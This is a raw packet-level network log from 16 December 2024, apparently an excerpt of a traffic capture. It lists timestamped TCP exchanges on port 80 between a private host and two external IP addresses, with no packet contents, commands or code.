Dec 16, 2024 11:03:33.281455994 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.281474113 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.281529903 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.281971931 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.282035112 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.282181025 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.282270908 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.282279015 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.282315016 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.282335043 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.282363892 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.282375097 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.282430887 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.282809019 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.282870054 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.282943964 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.282996893 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.283004045 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.283041000 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.283067942 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.283077002 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.283092022 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.283126116 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.283148050 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.283212900 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.283435106 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.283494949 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.283632040 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.283683062 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.283685923 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.283720970 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.283735991 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.283772945 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.283802032 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.283833027 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.283859015 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.283883095 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.283884048 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.283912897 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.283937931 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.283963919 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.284007072 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.284040928 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.284060955 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.284101963 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.284137964 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.284189939 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.284200907 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.284233093 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.284257889 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.284287930 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.284348011 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.284404039 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.284420013 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.284476995 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.284485102 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.284537077 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.284540892 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.284569979 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.284593105 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.284598112 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.284626007 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.284627914 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.284641027 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.284657955 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.284677982 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.284709930 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.284739971 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.284854889 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.285043955 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.285101891 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.285126925 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.285192966 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.285206079 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.285264015 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.285360098 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.285394907 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.285437107 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.285438061 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.285461903 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.285490990 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.285497904 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.285526991 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.285554886 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.285582066 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.285589933 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.285609961 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.285623074 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.285655975 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.285660982 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.285687923 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.285689116 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.285717010 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.285717964 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.285743952 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.285748005 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.285768032 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.285797119 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.285800934 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.285829067 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.285854101 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.285857916 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.285888910 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.285895109 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.285911083 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.285948992 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.285957098 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.285984993 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.285999060 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.286025047 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.286032915 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.286053896 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.286075115 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.286081076 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.286108017 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.286108971 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.286134958 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.286142111 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.286159992 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.286170959 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.286194086 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.286199093 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.286238909 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.286248922 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.286668062 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.286724091 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.286727905 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.286773920 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.286784887 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.286813021 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.286825895 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.286864996 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.287436008 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.287466049 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.287481070 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.287494898 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.287522078 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.287575960 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.287633896 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.288223028 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.288269043 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.288274050 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.288286924 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.288317919 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.288342953 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.288363934 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.288415909 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.289005995 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.289061069 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.289066076 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.289083004 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.289117098 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.289144039 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.289148092 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.289208889 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.289798975 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.289839029 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.289854050 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.289855003 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.289885044 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.289911032 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.289930105 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.289978981 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.290580988 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.290633917 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.290635109 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.290652990 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.290684938 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.290712118 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.290730953 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.290785074 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.291378975 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.291431904 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.291440964 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.291456938 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.291492939 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.291521072 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.291539907 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.291599035 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.292176008 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.292224884 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.292228937 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.292242050 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.292272091 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.292296886 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.292320013 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.292407036 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.292963028 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.293016911 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.293019056 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.293035984 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.293068886 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.293087959 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.293103933 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.293153048 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.293770075 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.293795109 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.293811083 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.293848038 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.293884039 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.293926954 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.293976068 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.294677973 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.294728041 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.294789076 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.294805050 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.294836998 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.294864893 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.294883013 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.294994116 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.295758963 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.295833111 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.295841932 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.295856953 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.295901060 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.295944929 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.295995951 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.401858091 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.402811050 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.402890921 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.403059006 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.403213024 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.403275967 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.404539108 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.404599905 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.404768944 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.404798985 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.404828072 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.404845953 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.405359983 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.405435085 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.405577898 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.405606985 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.405635118 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.405669928 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.405700922 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.405730009 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.405757904 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.405781984 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.405864954 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.406125069 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.406193018 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.406222105 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.406248093 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.406271935 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.406425953 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.406455040 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.406482935 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.406486988 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.406506062 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.406542063 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.406546116 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.406575918 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.406599045 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.406631947 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.407907963 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.407990932 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.408132076 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.408160925 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.408195972 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.408214092 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.408284903 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.408340931 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.408356905 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.408407927 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.408417940 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.408440113 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.408466101 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.408509970 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.408509970 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.408544064 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.408605099 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.408652067 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.408723116 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.408756971 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.408797979 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.408812046 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.408822060 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.408972979 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.409023046 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.409029961 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.409085989 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.409151077 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.409178019 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.409208059 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.409229040 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.467920065 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.468000889 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.468055964 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.468095064 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.468130112 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.468167067 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.468205929 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.468206882 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.468244076 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.468245983 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.468270063 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.468313932 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.468453884 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.468513012 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.468542099 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.468578100 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.468597889 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.468624115 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.468651056 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.468713045 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.469549894 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.469604969 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.469615936 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.469647884 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.469655037 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.469698906 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.469707966 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.469759941 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.470015049 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.470068932 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.470109940 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.470149040 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.470164061 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.470185041 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.470196962 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.470233917 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.471035957 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.471091032 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.471102953 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.471131086 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.471153021 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.471172094 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.471182108 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.471220970 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.471693039 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.471750021 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.471755028 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.471792936 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.471807003 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.471828938 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.471838951 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.471874952 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.472435951 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.472470999 CET	80	49833	31.41.244.11	192.168.2.5
